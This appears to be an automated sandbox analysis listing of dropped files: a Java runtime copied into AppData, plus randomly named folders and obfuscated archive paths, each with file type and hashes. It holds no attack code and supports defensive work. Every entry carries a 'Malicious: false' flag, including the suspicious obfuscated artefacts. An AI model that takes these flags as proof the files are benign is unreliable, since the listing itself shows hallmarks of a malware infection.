SHA-512:	2A35311D7DB5466697D7284DE75BABEE9BD0F0E2B20543332FCB6813F06DEBF2457A9C0CF569449C37F371BFEB0D81FB0D219E82B9A77ACC6BAFA07499EAC2F7
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\images\cursors\win32_CopyNoDrop32x32.gif
File Type:	GIF image data, version 89a, 32 x 32
MD5:	1E9D8F133A442DA6B0C74D49BC84A341
SHA1:	259EDC45B4569427E8319895A444F4295D54348F
SHA-256:	1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
SHA-512:	63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\images\cursors\win32_LinkDrop32x32.gif
File Type:	GIF image data, version 89a, 31 x 32
MD5:	694A59EFDE0648F49FA448A46C4D8948
SHA1:	4B3843CBD4F112A90D112A37957684C843D68E83
SHA-256:	485CBE5C5144CFCD13CC6D701CDAB96E4A6F8660CBC70A0A58F1B7916BE64198
SHA-512:	CF2DFD500AF64B63CC080151BC5B9DE59EDB99F0E31676056CF1AFBC9D6E2E5AF18DC40E393E043BBBBCB26F42D425AF71CCE6D283E838E67E61D826ED6ECD27
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\images\cursors\win32_LinkNoDrop32x32.gif
File Type:	GIF image data, version 89a, 32 x 32
MD5:	1E9D8F133A442DA6B0C74D49BC84A341
SHA1:	259EDC45B4569427E8319895A444F4295D54348F
SHA-256:	1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
SHA-512:	63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\images\cursors\win32_MoveDrop32x32.gif
File Type:	GIF image data, version 89a, 31 x 32
MD5:	CC8DD9AB7DDF6EFA2F3B8BCFA31115C0
SHA1:	1333F489AC0506D7DC98656A515FEEB6E87E27F9
SHA-256:	12CFCE05229DBA939CE13375D65CA7D303CE87851AE15539C02F11D1DC824338
SHA-512:	9857B329ACD0DB45EA8C16E945B4CFA6DF9445A1EF457E4B8B40740720E8C658301FC3AB8BDD242B7697A65AE1436FD444F1968BD29DA6A89725CDDE1DE387B8
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\images\cursors\win32_MoveNoDrop32x32.gif
File Type:	GIF image data, version 89a, 32 x 32
MD5:	1E9D8F133A442DA6B0C74D49BC84A341
SHA1:	259EDC45B4569427E8319895A444F4295D54348F
SHA-256:	1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
SHA-512:	63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\javafx.properties
File Type:	ASCII text
MD5:	170F96ADF03A5BB5C4491EF32C990C76
SHA1:	92914B23AF8198FF38C8D2B40193762E69AEB64A
SHA-256:	CEC6871EFA375D6A812ED453E91B7479D192644BF5B0A2F484D3909F3296DCEA
SHA-512:	25438C34E2935F0937AA6928B63DFC5C3CC6425104029D66BDACCBBB47805BA30C0EB2E688B473E2AD322272962E666F30C0891B9A4B9CEA822FFC6B0B095AC2
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\javaws.jar
File Type:	Zip archive data, at least v1.0 to extract
MD5:	3CE4ED4B3BB19EF4FAFD5F6584D6BCDC
SHA1:	4747660B5B57AEFC7B38E64641F9DD5DE1AD2936
SHA-256:	F17AF9A7A8A1F81A91AD866126B6D70DE7B2C95F388E724B9620D88C4325485D
SHA-512:	8BBCB402B48E0D6FFBB38E65DC1110AB6A88F2591EC19A928E1403F301A6EBF501FEFDFD82D2BBE775B89E27382408E16CFEFC0E2134F6DB5A6FF35CD902552A
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\jce.jar
File Type:	Zip archive data, at least v2.0 to extract
MD5:	16D24DA96B20188099C93F6322486A08
SHA1:	8ABEB866DD408E58086D17F98E6F32B9A9C5051E
SHA-256:	7B6E1CD976BF6CB6B3D65D355AC41D80F2FBE4C1E825B1C25D073DDACC88AFFD
SHA-512:	637A0A8A1FA55B44A79E7AFB5923B8B67FFBF7E92A81A456AC8F3A32C75DD0F83E45033EE71AB5FC64ACD2BA5964158A92340285A447E4C10F7CBBD79BC2194F
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\jfr.jar
File Type:	Zip archive data, at least v1.0 to extract
MD5:	3898D77811132A87D06CABDFCE6D78A4
SHA1:	A7C87B50854D4DFE640F3142EE26197D9B603CC8
SHA-256:	085EEEE18A144F058FD83B305CB484171C9F7F9BC7DEDCE342F5EFC541B1D03F
SHA-512:	01B02BE66C371C7A2232C51A32B05A26F409F5614DDDA936D44AE5D3629857CA1ABE10D4BC2D44C390AF8DD9697D260409ABD827E0BCBDB8F4B57F28D736932A
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\jfr\default.jfc
File Type:	XML document text
MD5:	971683E69CA9CC831AFEC282E999517C
SHA1:	B054DE4C4A6F6E04800942C3FCDF2E99963D91FA
SHA-256:	0E90E5023F69C44497F1886BC11FCDC8CAF8E5BDB0FBD86AC653327A61E51451
SHA-512:	99DB3A71C96D959B8BC5E5896C834BE43F37AD1EFF5F7D915183521289563AB7E103DD7D00028C73CB05BAE1C0D53441AA0C1D47B2034CD9E08AAD7F2D2BA247
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\jfr\profile.jfc
File Type:	XML document text
MD5:	0876BCEDFD8E60815378359F5A428F3E
SHA1:	EEE5A1D7F47CCE948AF54821F0C5DBC9FCA28925
SHA-256:	0F459267C79FEC84D7C01F1BC7085821248D91D16324AF7EEF04274A243BED38
SHA-512:	132A5B8E78BD2D047F1A09654C63C4D59B892546270E1D99694E4CEF5A7B064A34CA3DACF6BB8028354205C348153820C48D79D2E9A42BBAD5A90EB252976C45
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\jfxswt.jar
File Type:	Zip archive data, at least v1.0 to extract
MD5:	BB8A691F941897A5FA57BCB8CF9C5ACA
SHA1:	5974DC9E30A12EC134BC8B3557B395F5079810AC
SHA-256:	C9E614ABC007E61CA322F291435A0BED63CAECD71407D85EF6FDB38A0D3BFBD2
SHA-512:	73D59B29601D50866E29F7D84C109FC114E430F69ECE0A062CEA83F2E92DFFD5FC947EE3EBF37A05788831A783DBA6E4F7EC13B148BFF27957AF7D9D96EAE4D6
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\jsse.jar
File Type:	Zip archive data, at least v1.0 to extract
MD5:	4968B980CF80BF734B4189F71E885A4D
SHA1:	BAC4F583C89D787E65D3B1CF6145316792AB121D
SHA-256:	26DD169CECCC3A1F5E255AEBAFDCFF1399B21AF498116AC568CAAACD92C16DDF
SHA-512:	4967F2CC2DA3E8CF7A1B90D39F285D8E3AC1D30C2F56B350F0FCF95DA42EB414C285390D062FE0716AEDAA2ACC34A1DEA0380382602A97D5C04720BCBEBB199D
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\jvm.hprof.txt
File Type:	ASCII English text
MD5:	C677FF69E70DC36A67C72A3D7EF84D28
SHA1:	FBD61D52534CDD0C15DF332114D469C65D001E33
SHA-256:	B055BF25B07E5AC70E99B897FB8152F288769065B5B84387362BB9CC2E6C9D38
SHA-512:	32D82DAEDBCA1988282A3BF67012970D0EE29B16A7E52C1242234D88E0F3ED8AF9FC9D6699924D19D066FD89A2100E4E8898AAC67675D4CD9831B19B975ED568
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\logging.properties
File Type:	ASCII English text
MD5:	809C50033F825EFF7FC70419AAF30317
SHA1:	89DA8094484891F9EC1FA40C6C8B61F94C5869D0
SHA-256:	CE1688FE641099954572EA856953035B5188E2CA228705001368250337B9B232
SHA-512:	C5AA71AD9E1D17472644EB43146EDF87CAA7BCCF0A39E102E31E6C081CD017E01B39645F55EE87F4EA3556376F7CAD3953CE3F3301B4B3AF265B7B4357B67A5C
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\management-agent.jar
File Type:	Zip archive data, at least v2.0 to extract
MD5:	FCB5C0082CF6B0231811B1719F9EA7D6
SHA1:	08521B97E6A2B7CD85894F63018CF61521F498A9
SHA-256:	C80447F56C74DE89077B7616A56836349605C41933900A27EB52E012A56F9A32
SHA-512:	D4430BF469BCEC9276AE97C09857AF13522418945186607229A355B1B2A6E972B37D782762D7BF4DF1042E5F41A12989F8F7672900C0594BBB150B42712A33DB
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\management\jmxremote.access
File Type:	ASCII English text
MD5:	F63BEA1F4A31317F6F061D83215594DF
SHA1:	21200EAAD898BA4A2A8834A032EFB6616FABB930
SHA-256:	439158EB513525FEDA19E0E4153CCF36A08FE6A39C0C6CEEB9FCEE86899DD33C
SHA-512:	DE49913B8FA2593DC71FF8DAC85214A86DE891BEDEE0E4C5A70FCDD34E605F8C5C8483E2F1BDB06E1001F7A8CF3C86CAD9FA575DE1A4DC466E0C8FF5891A2773
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\management\jmxremote.password.template
File Type:	ASCII C++ program text
MD5:	7B46C291E7073C31D3CE0ADAE2F7554F
SHA1:	C1E0F01408BF20FBBB8B4810520C725F70050DB5
SHA-256:	3D83E336C9A24D09A16063EA1355885E07F7A176A37543463596B5DB8D82F8FA
SHA-512:	D91EEBC8F30EDCE1A7E16085EB1B18CFDDF0566EFAB174BBCA53DE453EE36DFECB747D401E787A4D15CC9798E090E19A8A0CF3FC8246116CE507D6B464068CDB
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\management\management.properties
File Type:	ASCII English text
MD5:	81A43119AB15099C1D70E2D683FC8C0A
SHA1:	5496AA366AEC8168218963F8F85FC9D3F8691DD5
SHA-256:	FCACFA57CE3FE6372C2273ABC032A1320BE021AF42553E2104DB9937B6771783
SHA-512:	1526F581582DED7982C3BF1D0F0D8A3AFC0FF5B0A48B921DD0ACD29BD68B587546618E261B971FAE48C72BE410D106E7DD915723EDC4FFE9498FB0B45DC84AD0
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\management\snmp.acl.template
File Type:	ASCII C++ program text
MD5:	71A7DE7DBE2977F6ECE75C904D430B62
SHA1:	2E9F9AC287274532EB1F0D1AFCEFD7F3E97CC794
SHA-256:	F1DC97DA5A5D220ED5D5B71110CE8200B16CAC50622B33790BB03E329C751CED
SHA-512:	3A46E2A4E8A78B190260AFE4EEB54E7D631DB50E6776F625861759C0E0BC9F113E8CD8D734A52327C28608715F6EB999A3684ABD83EE2970274CE04E56CA1527
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\meta-index
File Type:	ASCII text, with CRLF line terminators
MD5:	91AA6EA7320140F30379F758D626E59D
SHA1:	3BE2FEBE28723B1033CCDAA110EAF59BBD6D1F96
SHA-256:	4AF21954CDF398D1EAE795B6886CA2581DAC9F2F1D41C98C6ED9B5DBC3E3C1D4
SHA-512:	03428803F1D644D89EB4C0DCBDEA93ACAAC366D35FC1356CCABF83473F4FEF7924EDB771E44C721103CEC22D94A179F092D1BFD1C0A62130F076EB82A826D7CB
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\net.properties
File Type:	ASCII English text
MD5:	19A5C7F5186854362281A152E756CE2F
SHA1:	CC738221F126334DE60D73B5DB63789C41E282AC
SHA-256:	5D62F39E6EB46C7A731B6997A14ACFEB63F5C95DFCEF8DE3D4D94B5D571372C6
SHA-512:	24E3489B825015226C7C2A1AC6CC2D20D5056C8D578D612F73A35AA43A953CFE331FD6CBDC251CE23CFAA403130848822DD3EFB30ED427F25A1221BA0A2B2BF3
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\plugin.jar
File Type:	Zip archive data, at least v1.0 to extract
MD5:	B54491C083786CF2972723668775ABBD
SHA1:	0EB425BFCF7763E4D7A9C932479B69B3482476E2
SHA-256:	61E8DDBD2F1378472FE52C51C1A9FAA4714C6494C2C00F5FEE09E712E6393B40
SHA-512:	8D7493714D2025A40307A043A09693333F510811DA004B466C17853D69D759965B34108467D81BD4835C3B22F75AADC09EB9C7AC70BE85BE05A40A45353087B5
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\psfont.properties.ja
File Type:	ASCII text
MD5:	7C5514B805B4A954BC55D67B44330C69
SHA1:	56ED1C661EEEDE17B4FAE8C9DE7B5EDBAD387ABC
SHA-256:	0C790DE696536165913685785EA8CBE1AC64ACF09E2C8D92D802083A6DA09393
SHA-512:	CCD4CB61C95DEFDCBA6A6A3F898C29A64CD5831A8AB50E0AFAC32ADB6A9E0C4A4BA37EB6DEE147830DA33AE0B2067473132C0B91A21D546A6528F42267A2C40E
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\psfontj2d.properties
File Type:	ASCII English text
MD5:	F8734590A1AEC97F6B22F08D1AD1B4BB
SHA1:	AA327A22A49967F4D74AFEEE6726F505F209692F
SHA-256:	7D51936FA3FD5812AE51F9F5657E0E70487DCA810B985607B6C5D6603F5E6C98
SHA-512:	72E62DC63DAA2591B48B2B774E2479B8861D159061B92FD3A0A06256295DA4D8B20DAFA77983FDBF6179F666F9FF6B3275F7A5BCF9555E638595230B9A42B177
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\resources.jar
File Type:	Zip archive data, at least v1.0 to extract
MD5:	5779CA817DB790AE16FCF0AB9EDF43ED
SHA1:	87FF661CA136E4604D54A7F30F624516786DAF72
SHA-256:	1707746EBB1AFF43523E85801FF4446CDC1674120F7EBE8777242A3A72B33699
SHA-512:	1C15E985D04C2D047665D97A79D9D003B6A3AA69BAD58B8368D183B0995D4A22A7B52CDFF086EF1225C3A6B8C2A54358AB4481B6154CC4466670E76A97BBA82B
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\rt.jar
File Type:	Zip archive data, at least v1.0 to extract
MD5:	F549CEAD08CE871DA14A46EEE67151DA
SHA1:	BDD90BE6CDFED2FA0622AE1571A4855ADC4C3362
SHA-256:	A1C28605D405FF4594DFEC0F8D0FEAFECEF02E16C252A282EB834D161AD11118
SHA-512:	F6A21D1A14BA76DBF12F03F0AFAAEBE51FE2ED9072E227C9F36A56BB300A7243E8D4D45F45D5E7DB8D93CECD2A8CF6949F778CE87F26ED74019D542FD9175D40
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\security\US_export_policy.jar
File Type:	Zip archive data, at least v2.0 to extract
MD5:	EE4ED9C75A1AAA04DFD192382C57900C
SHA1:	7D69EA3B385BC067738520F1B5C549E1084BE285
SHA-256:	90012F900CF749A0E52A0775966EF575D390AD46388C49D512838983A554A870
SHA-512:	EAE6A23D2FD7002A55465844E662D7A5E3ED5A6A8BAF7317897E59A92A4B806DD26F2A19B7C05984745050B4FE3FFA30646A19C0F08451440E415F958204137C
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\security\blacklist
File Type:	ASCII text
MD5:	2D60AEECC745F096E96E93C5E04B68C3
SHA1:	E0992C1DA2395676E4982EEF2810475D359E3C94
SHA-256:	964BD816655288112E4153015C59918C4356453C08AE8486625A3D01B61EB5BA
SHA-512:	98298429EFB4A93C95ABC4DE608E1B0F6B962D6FDB36AF6F237C64971A3794E426452C9900304717881E908C087538A09F0B12516413C21E705DF8686CA40AFB
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\security\blacklisted.certs
File Type:	ASCII text
MD5:	91C7195D1ABF0081758CE00C8248732C
SHA1:	9F8852FFCBA434070E23DC2E1F22B3B284BA8854
SHA-256:	A8E6DAF874FA9854C80EB6ABA7B4D327B641F74D95033ADC2A80C6D6D0BA26E2
SHA-512:	C1D464158AA86C622BECB197C0F95C9D2B24D5E9CD38707AE47E6D7B2F614CB1F99F146C9288E1E93C6B103B0E78471544CA1B08BB08D24BFDE758E894626377
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\security\cacerts
File Type:	Java KeyStore
MD5:	9309C959C1E58990B8B7DF6B4D53480A
SHA1:	BF49219425E56B7B78FFF55C60B84DB085FCC036
SHA-256:	DE56FBDAFBEBDC669B87B5B629025F247AE499226734300EB8C902A2DBEA5D75
SHA-512:	076331311619093BE082EC084DFCDF3BFCAE3438F78591A14951643CEC2E22E15BEB6ED6FCDC8F2EE38907C6B79966260E6930BF4A94D701079C8F2F144F6D61
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\security\java.policy
File Type:	ASCII C++ program text
MD5:	11340CD598A8517A0FD315A319716A08
SHA1:	C0112209A567B3B523CFED7041709F9440227968
SHA-256:	B8582889B0DF36065093C642ED0F9FA2A94CC0DC6FDE366980CFD818EC957250
SHA-512:	2B6DADC555EEB28DC1C553AB429F0CB9E3AD9AA64DFA2B62910769A935A1E6030A7FF0DDE2689F29C58D1B0720416D6B99FFA19BD23E6686EFB1547AFB7DCCFD
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\security\java.security
File Type:	ASCII English text, with CRLF line terminators
MD5:	3FA83777D956A15D705B74A195EF59F6
SHA1:	7F085E6436B281AB5E8D0A0A97263DEDD09D6D1F
SHA-256:	FE9C2F711FDE60E13FC9B5A67758499E927B793BE2C496845EE39698FDB18EA1
SHA-512:	D6744069F5A6EF2A78E6D567C4BB8E9FDB9EB0614E809F20EE67F9C336D0853C53023604A8A60BA64E25E5EE8FEE049340536718B8345326CA1997E3F8F27922
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\security\javaws.policy
File Type:	ASCII text
MD5:	9107D028BD329DBFE4C1F19015ED6D80
SHA1:	4384CA5E4D32F7DD86D8BADDD1E690730D74E694
SHA-256:	B7A87D1F3F4B7BA1D19D0460FA4B63BD1093AFC514D67FE3C356247236326425
SHA-512:	81B14373B64CE14AF26B70D12D831E05158D5A4FA8CEC0508FEF8A6CA65B6F4EF73928F4B1E617C68DDEACFF9328A3D4433B041B7FB14DE248B1428C51DBC716
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\security\local_policy.jar
File Type:	Zip archive data, at least v2.0 to extract
MD5:	57AAAA3176DC28FC554EF0906D01041A
SHA1:	238B8826E110F58ACB2E1959773B0A577CD4D569
SHA-256:	B8BECC3EF2E7FF7D2165DD1A4E13B9C59FD626F20A26AF9A32277C1F4B5D5BC7
SHA-512:	8704B5E3665F28D1A0BC2A063F4BC07BA3C7CD8611E06C0D636A91D5EA55F63E85C6D2AD49E5D8ECE267D43CA3800B3CD09CF369841C94D30692EB715BB0098E
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\sound.properties
File Type:	ASCII English text
MD5:	4F95242740BFB7B133B879597947A41E
SHA1:	9AFCEB218059D981D0FA9F07AAD3C5097CF41B0C
SHA-256:	299C2360B6155EB28990EC49CD21753F97E43442FE8FAB03E04F3E213DF43A66
SHA-512:	99FDD75B8CE71622F85F957AE52B85E6646763F7864B670E993DF0C2C77363EF9CFCE2727BADEE03503CDA41ABE6EB8A278142766BF66F00B4EB39D0D4FC4A87
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\tzdb.dat
File Type:	data
MD5:	F41F90354EBF3FECB33068758FA8FE7C
SHA1:	673DB134570A2698631DBCC5C5054D4465B7A6EA
SHA-256:	81C299207A46CC8BCE2E11DD5195E2F4D0D355EDFE7F3C5D6B88B1EB431A7616
SHA-512:	8B66550D3D33B166DAFB541E071B7FC50933BA49E413C7407672C94E437C952E18DA88CAC7D7DB8C784F1C36DE90B86584CB85B89F3151203F0E8D2C9F11A504
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\tzmappings
File Type:	ASCII English text
MD5:	7D4ABBCFB06D083F349E27D7E6972F3C
SHA1:	EB91253590526F7BE7415839CCBF702683639C8C
SHA-256:	D936EE24810B747C54192B4B5A279F21179FE3CEB42D113D025A368EBB7CB5A7
SHA-512:	E5C2FBBC07CD53BAF14F3CC239B56B42B73DE47F9B7904AABF7D97695D2AB8866D0C8179235CBF022245949B9B8E419985E328AA5ED333B14B8B4DE2C82B225E
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\release
File Type:	ASCII text, with very long lines
MD5:	D5ADDA5A74BDCAA429B6266DAA7E9975
SHA1:	9304825D37F13F885FB853C5B9B1243EC20BE518
SHA-256:	C0FD50797E8A1A72F1B80CDB8FF1F46291301DCD31D00F3833189C690B69B91C
SHA-512:	AA994E886BF150FD2631727E2892D0EE7C7C3E310FE03DA6FEA87385E2C1F3069DD080319CC9352FAA3025CA13EB5E7EEF237D2A5D1BBEAB5C25AA4D2C5B2574
Malicious:	false

C:\Users\user\eDdlsoVKfgW\AknzQIkoyKh.qmSBQy
File Type:	Zip archive data, at least v2.0 to extract
MD5:	4A1F885F0CB4392AE2AD7AE06B05811E
SHA1:	29C8FF235A21D9BFB1D26734DF52BDBA897929E3
SHA-256:	9A56B122765EF5C96B8A1CC29D65D2E906FF0D805246755323462D6DDB3CA6A5
SHA-512:	4F0DCF2CAD01FED0090CDFAFFACEF660B37350FFD2AF52F11CF701C2A1CAFA357EA96797FE1846AF7B11EE34E3B4972251B00D51FCFA84B3782271598ACA534E
Malicious:	false

C:\Users\user\eDdlsoVKfgW\ID.txt
File Type:	ASCII text, with no line terminators
MD5:	DFF341BDFC8CCEEDAE436E8B80E72FC6
SHA1:	814A95CFA679135EE9CD340E9251F2A35D27A252
SHA-256:	F3053D250F40BBAC25B4FB6D396B8F5F159B95B347CFE788D9D1666DB12CDD83
SHA-512:	7B88C2F23AC2CD9F25F0264D67616CFF143EF7C19FED70DE2EA4E349C4B5DA7968A1E0E214CBD469A40413A9FAF06D6849AC62F0ACC7F3E96DC4BC9BE19658AE
Malicious:	false

C:\Users\user\fUTkALeaTxM\ID.txt
File Type:	ASCII text, with no line terminators
MD5:	67955CEDDB80CE089836368EE2447085
SHA1:	A1B64BBFC9B3FA3F3910A674A741B87131328043
SHA-256:	B21CCB5C119E33A3E4FAC7CFEF210B400A9DA9E338DF8EEC9BDB7F26D026AF08
SHA-512:	B0DF274850EB9994623BD9CE34C705847A60AFB22E824266182E6211CB67F61F1066A16C6D1B62464ADBB385F224C24BFC65B2B21CBFD3BB0A34548C9747C11D
Malicious:	false

C:\Windows\System32\test.txt
File Type:	ASCII text, with very long lines, with no line terminators
MD5:	14E16739D2837FD5E41C92259440A56D
SHA1:	DD564F5EBE692896A92A2F8501B44B216000C281
SHA-256:	762DDCBFEB429AEF683E9294409A8F7A8C3941237EE0C4346D538E9329EAB0B0
SHA-512:	51606F6C8A3BC39F022F6E0A54953FE46E198A0F19CF3BAD02062B2E69DB67570F89B8C9ECB076D193F365135DAEA8D84C011BFE6A09C32E04D52CA96A0FCFD1
Malicious:	false

C:\jar\META-INF\MANIFEST.MF
File Type:	ASCII text, with CRLF line terminators
MD5:	7FB90BE4EBA7F0B19B439BD6C114B8BC
SHA1:	AD9742352FF82FF3EE40D8CB0D4CBF9867D2C0AF
SHA-256:	0E3CEA4599B019245B3AF52527D8AF84F30D3F47E638FCC3CD2841F3D1F72513
SHA-512:	DD47E9788734469F6C3ED7D63B727895CF43C4CF40B642D55FC902D4724509E890C2052425C234F5AB9A3C28571AB5944DF832830268117628C668C428EC2A71
Malicious:	false

C:\jar\OnayiZufuhugu\OgiyizEfahiGu\125jaj0me9r1m4cq2duaj4bu4o533ij23fnte9e2gigjjq1har181vq4m\1i3dqhqotr5uvn0krdvpiarrmellq56gg0paotha6hpdp95llkufbp0ruq4qfk37hkotid5vrkm3m9k6p4nli6pb2j9v442ae8u8d1e8rjc457u8u43qoqeog94kjqlp12t3d1150k7lsj3u70tk48agrsaomrl656ind
File Type:	cannot open `dropped\1i3dqhqotr5uvn0krdvpiarrmellq56gg0paotha6hpdp95llkufbp0ruq4qfk37hkotid5vrkm3m9k6p4nli6pb2j9v442ae8u8d1e8rjc457u8u43qoqeog94kjqlp12t3d1150k7lsj3u70tk48agrsaomrl656ind.1.dr' (No such file or directory)
MD5:	F4CE8293260FD8838B9F064DA5DDEDDB
SHA1:	85DC742663A0AA375EBD924D83664ECF6568E487
SHA-256:	81B45C9498CCAFE7575B4AB094B0A6D7ACC18E1BC5E1DBA97C1E14ECF4BE7278
SHA-512:	8837E35D748CCCF461A8C968F9C46C4782CAF52C1B79055B07778A4582B3906797E4D41D3DD95F9DE8302E5744C912668D73EA1755E9570D4D3F5F779908A396
Malicious:	false

C:\jar\OnayiZufuhugu\OgiyizEfahiGu\149qgube7kaot6f2k7fl29go6tm9q
File Type:	data
MD5:	2C3E07283B6406C84E3B7C1E24AFAED3
SHA1:	76F0092B92E175B9A2316A7C8BE5B50FAF7ABF9A
SHA-256:	821A39C0EBA7E29934400955FF5956102CEF343AB54860B035FFE370515D59CD
SHA-512:	4F1BB93F45AF5DC798AE653E611112BCB68D3A1519998C64A7486EB1679124E92A3AFF36BCF4CA31358DC8E714A098C0245B4FDA8AB31281E9984B607FA832F9
Malicious:	false

C:\jar\OnayiZufuhugu\OgiyizEfahiGu\19eeuepk8kap47975jgf7uend0mmul9rurhu70cq0gb9c2qco8tbo8ln8vuksg5mb8taq9tg9vks9teeic0teoq348u5j34apmm22f42lqtom00a9befnsltpclt8e7l3dgmvl59veb0i7fiunj0m1ohpio3nus5s8v51ulgblltm77n9roj5k6l7rd7rtca450l4vg2f43qr5brptu9bse2j8dgp7e
File Type:	cannot open `dropped\19eeuepk8kap47975jgf7uend0mmul9rurhu70cq0gb9c2qco8tbo8ln8vuksg5mb8taq9tg9vks9teeic0teoq348u5j34apmm22f42lqtom00a9befnsltpclt8e7l3dgmvl59veb0i7fiunj0m1ohpio3nus5s8v51ulgblltm77n9roj5k6l7rd7rtca450l4vg2f43qr5brptu9bse2j8dgp7e.1.dr' (No such file or directory)
MD5:	B411B557A02E6769E9657CC4183DC97B
SHA1:	2EC43FB6539870737F0E9F0AB82ABAAE1909D1B6
SHA-256:	0B3DE51CDA9F7712D5AF17D1990DA6D9893E290E2B59420347E1AB53A0E23354
SHA-512:	B55680D09A8E32ECA50D4054AE57BB1401522395096D921969E3892DF418BF437131B1EAC5B469057404B201DE95281B0A679718C1D2F9A2CC1DE0B42F64BD18
Malicious:	false

C:\jar\OnayiZufuhugu\OgiyizEfahiGu\1bbl6h36n268g2iefoeiq9h3g6cpif8acen2vlo1ekampi1nq9pdojaf0itj24oll8hsnf1a0rukf2he4tpit6din92i81h35257g19vo647d4d45grcbejv40nt81toh9gt4hkbet41bglvmrhd3hul3epf5rhfphgki1bqld45ikj8bn9uo\2argmju5lptpl9k36qhuolptat3s42uf4q3m0gojl
File Type:	data
MD5:	8DCE625BE764A952A7E4A82D3F8C277D
SHA1:	4231671F26B230D1821275483743E6706521D8B2
SHA-256:	9E8D48BAA92248B5C7A2E405EF0A891B0D0E7B10B11FEBE3FEACC9A6DB0A024C
SHA-512:	AA48381A164AC6656D7208313F69943A5E4460474A8CFEAE4B69EBD14265889F4DA3628A5D4ECFD493B98E478C82CF64AF630C9DB1800EBE99089EEC7FB68E63
Malicious:	false

C:\jar\OnayiZufuhugu\OgiyizEfahiGu\1c7m22vk2jdoadkp9d2tepfdka36t9d6hk1m78pg79bgkkrobug6omnr62b5mc2qbqdn44ra7u6lij9u6lku7vdiiuo3jd43ujvveh0gqvulqpjeuj6qhalfs7uo5fgj45u4ht5b3amgts8uknfirfe4hlrguitl2dd29imruu\2ium9r5ssbn1g2390qle\4\78o6opbopkkvv15v3qnm286acgunr
File Type:	data
MD5:	8740615A308C6D89A3BA2D721D1A247A
SHA1:	9EC8BEB98539C57047B13A27097F530D351FB9F6
SHA-256:	3E9545022A00D020EF00DD6E40222A447F8D0BED0E2A5EA711998971D9462D9B
SHA-512:	E06B31792DD455300BBA2757050C1E527893181D0F5231254B97E82244F5E8A7FED5C4DB606E85696FCEA9CF7ECEFEB6F96F7AA8B51403820895A2E499EFCF75
Malicious:	false

C:\jar\OnayiZufuhugu\OgiyizEfahiGu\1eo5ov1k1qjpksq69lc29honggmf2l8b34uob6hvfulktttmkd
File Type:	data
MD5:	E63823F366F8705A5205E8CBE2355E28
SHA1:	5B62BD4896D4B124252A081447A9F55098F59697
SHA-256:	D2A2EA9B318380BC9F166CD0BF21E11316F212CC8DB9E599660F16BB2D6432F8
SHA-512:	E282B43BEBE4F94036C7A371D73115701CA57A616682BFD6A22A85819FCE0EC11AF5675BF5464A44CE47E15EF9F54C7E8C13BFFE95A9EE73863AA28A3946D005
Malicious:	false

C:\jar\OnayiZufuhugu\OgiyizEfahiGu\1euq31tc\6b23jg6me8uud4ri8k94astksov83h7f3jl9mp9uq70i28novp2u9skdi45cl46eg6o32ab9t5nvmfg1jee\8poc1lvdpg34r77imivh29knrftrpu5i1kulad87f3jn6eaogd7arv4ve5dokjudpoddjj39tteg9mqkrs7bnpndc0cmq1u2japqq6crcoi6d\4ldtrnkog2ukg800dbml
File Type:	data
MD5:	67164E51363E00DA23299E99A8393578
SHA1:	894CBAA9DFCB03189316D89184E58E29EC4270CD
SHA-256:	12B8123028BA6B8F2526D206C9E1A16E20DE8F92072DAD21309B98AFDBF10F6F
SHA-512:	033431756FFB2A1180C18967F82E74D17DC7E1244678C503F1F1F5174E66B2166DA3A06300D294E32628CEA67DFED8A73C24B925ADF6592B3096927141FDD137
Malicious:	false

